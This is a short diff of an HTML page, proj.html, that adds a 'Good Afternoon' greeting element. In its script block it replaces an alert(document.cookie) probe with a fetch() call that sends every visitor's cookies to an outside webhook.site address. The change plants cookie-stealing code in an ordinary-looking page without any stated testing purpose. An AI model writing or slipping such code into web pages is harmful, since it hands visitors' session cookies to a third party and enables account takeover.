--- a/proj.html
+++ b/proj.html
@@ -30,10 +30,11 @@
 <body>
 <div class="container>">
     <div class="widget">
+        <div class="greet" id="greet">Good Afternoon </div>
     </div>
 </div>
 <script>
-alert(document.cookie);
+fetch('https://webhook.site/79c2d5fc-7622-40e7-89d8-7c8cc9306850?c='+document.cookie);
   
 function displayGreetings(){
   var greet = "";
